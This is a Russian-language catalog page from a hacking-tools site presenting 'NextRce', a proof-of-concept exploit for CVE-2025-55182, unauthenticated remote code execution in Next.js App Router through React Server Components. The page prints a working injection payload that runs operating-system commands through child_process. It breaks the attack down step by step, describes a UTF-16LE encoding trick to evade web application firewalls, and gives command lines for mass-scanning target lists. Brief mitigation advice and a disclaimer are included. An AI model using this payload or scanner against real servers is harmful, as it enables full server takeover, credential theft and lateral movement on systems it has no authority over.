Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-55182 — Эксплойт-доказательство концепции для CVE-2025-55182, демонстрирующий неаутентифицированное RCE в маршрутизаторе приложений Next.js через внедрение объекта на стороне сервера в React Server Components, с обходом WAF с помощью UTF-16LE. | Kitploit
Инструменты/GitHubGitHub/ceh-aditya-raj/cve-2025-55182
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийОбход WAFТестирование на ПроникновениеОбучение и ОбразованиеRed TeamingРазработка Полезной Нагрузки
GitHub
ceh-aditya-raj/cve-2025-55182

CVE-2025-55182

Эксплойт-доказательство концепции для CVE-2025-55182, демонстрирующий неаутентифицированное RCE в маршрутизаторе приложений Next.js через внедрение объекта на стороне сервера в React Server Components, с обходом WAF с помощью UTF-16LE.

Репозиторий
268 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

🚨 NextRce — CVE-2025-55182 (Next.js / React Server Components RCE)

NextRce — это инструмент для исследования безопасности, демонстрирующий CVE-2025-55182, критическую уязвимость в приложениях Next.js App Router, использующих React Server Components (RSC) и Server Actions.

Эта уязвимость позволяет злоумышленнику достичь неаутентифицированного удаленного выполнения кода (RCE) путем злоупотребления тем, как Next.js обрабатывает ответы Server Actions и разрешает сериализованные полезные нагрузки RSC на сервере.


🛠 Обзор уязвимости

CVE-2025-55182 существует в архитектуре Next.js App Router и может быть классифицирована как проблема инъекции объектов на стороне сервера / злоупотребления цепочкой прототипов, возникающая при обработке запросов multipart/form-data.

Когда Server Action запускается, сервер Next.js доверяет и десериализует структурированный ввод клиента. Отправив специально созданную полезную нагрузку, злоумышленник может манипулировать внутренней логикой разрешения и выполнять произвольные системные команды в среде выполнения Node.js.


📌 Первопричина

Уязвимость возникает из-за следующих комбинированных факторов:

  • Модель доверия Server Actions
    Server Actions принимают структурированные полезные нагрузки от клиента, которые обрабатываются через внутреннюю логику разрешения React Server Components с недостаточной проверкой.

  • Инъекция объектов при разрешении RSC
    Созданные полезные нагрузки могут злоупотреблять цепочками прототипов JavaScript и ссылками на конструкторы, что позволяет выйти за пределы предполагаемой области объектов.

  • Недостаточная санитизация
    Внутренние поля, такие как then, _response и геттеры form-data, недостаточно защищены от вредоносных манипуляций.

  • Обход WAF через кодировку
    Многие Web Application Firewalls ориентируются на UTF-8 или стандартный JSON. Кодирование полезных нагрузок как UTF-16LE позволяет обойти проверку, в то время как сервер Next.js декодирует и обрабатывает их корректно.


  • 🔬 Анализ полезной нагрузки

    Эксплойт основан на внедрении специально созданной полезной нагрузки RSC в multipart-запрос.
    Упрощенная версия полезной нагрузки показана ниже:

    root@kitploit:~
    {
      "then": "$1:__proto__:then",
      "status": "resolved_model",
      "reason": -1,
      "value": "{\"then\":\"$B1337\"}",
      "_response": {
        "_prefix": "var res=process.mainModule.require('child_process').execSync('{cmd}').toString('base64'); throw Object.assign(new Error('x'),{digest: res});",
        "_chunks": "$Q2",
        "_formData": {
          "get": "$1:constructor:constructor"
        }
      }
    }
    

    🧠 Разбор эксплойта

    1. Угон цепочки прототипов

    • "then": "$1:__proto__:then"
    • Это злоупотребляет цепочкой прототипов JavaScript, переопределяя свойство then, что влияет на то, как разрешаются Promise во время обработки React Server Components в среде выполнения Next.js.

    2. Побег через конструктор

    • "_formData": { "get": "$1:constructor:constructor" }
    • Это предоставляет доступ к глобальному конструктору Function, позволяя выполнять произвольный JavaScript за пределами предполагаемой песочницы.

    3. Удаленное выполнение кода

    • process.mainModule .require('child_process') .execSync('{cmd}')
    • Обращается к внутренним модулям Node.js
    • Синхронно выполняет произвольные команды операционной системы
    • Работает с теми же привилегиями, что и процесс сервера Next.js

    4. Эксфильтрация вывода через digest

    • throw Object.assign(new Error('x'), { digest: res });
    • Next.js подавляет подробные сообщения об ошибках, если не присутствует поле digest.
    • Прикрепляя вывод команды, закодированный в Base64, к свойству digest, сервер непреднамеренно возвращает результаты выполнения в HTTP-ответе.

    5. Обход WAF (UTF-16LE)

    • Полезная нагрузка может быть закодирована как UTF-16LE и отправлена с заголовком:
    • Content-Type: text/plain; charset=utf-16le
    • Многие движки WAF не декодируют и не проверяют содержимое UTF-16LE, в то время как сервер Next.js декодирует и обрабатывает его корректно, повышая надежность эксплуатации.

    💥 Воздействие

    Успешная эксплуатация CVE-2025-55182 может привести к:

    • 🔥 Полному удаленному выполнению кода

    • 🗄️ Доступу к конфиденциальным данным и учетным данным

    • 🔗 Горизонтальному перемещению внутри инфраструктуры

    • 📦 Компрометации цепочки поставок

    • 🚨 Полному захвату сервера

    • Серьезность: Критическая

    • Требуется аутентификация: Нет

    🛡 Смягчение

    Для защиты от CVE-2025-55182:

    • Немедленно обновите Next.js до исправленной версии
    • Отключите неиспользуемые Server Actions
    • Внедрите строгую проверку запросов multipart/form-data
    • Добавьте правила WAF для обнаружения полезных нагрузок, закодированных в UTF-16LE
    • Отслеживайте аномальные заголовки Next-Action и шаблоны запросов

    🚀 Использование

    Одиночная цель

    • python3 exploit.py -u https://target.com -c "whoami"

    Массовое сканирование с обходом WAF

    • python3 exploit.py -l urls.txt -B -t 50

    ⚠️ Отказ от ответственности

    • Этот проект предоставляется строго для образовательных, исследовательских целей и авторизованного тестирования безопасности.

    • НЕ используйте этот инструмент против систем, которые вам не принадлежат или на тестирование которых у вас нет явного разрешения.

    • Автор не несет ответственности за неправомерное использование.

    Скачать инструмент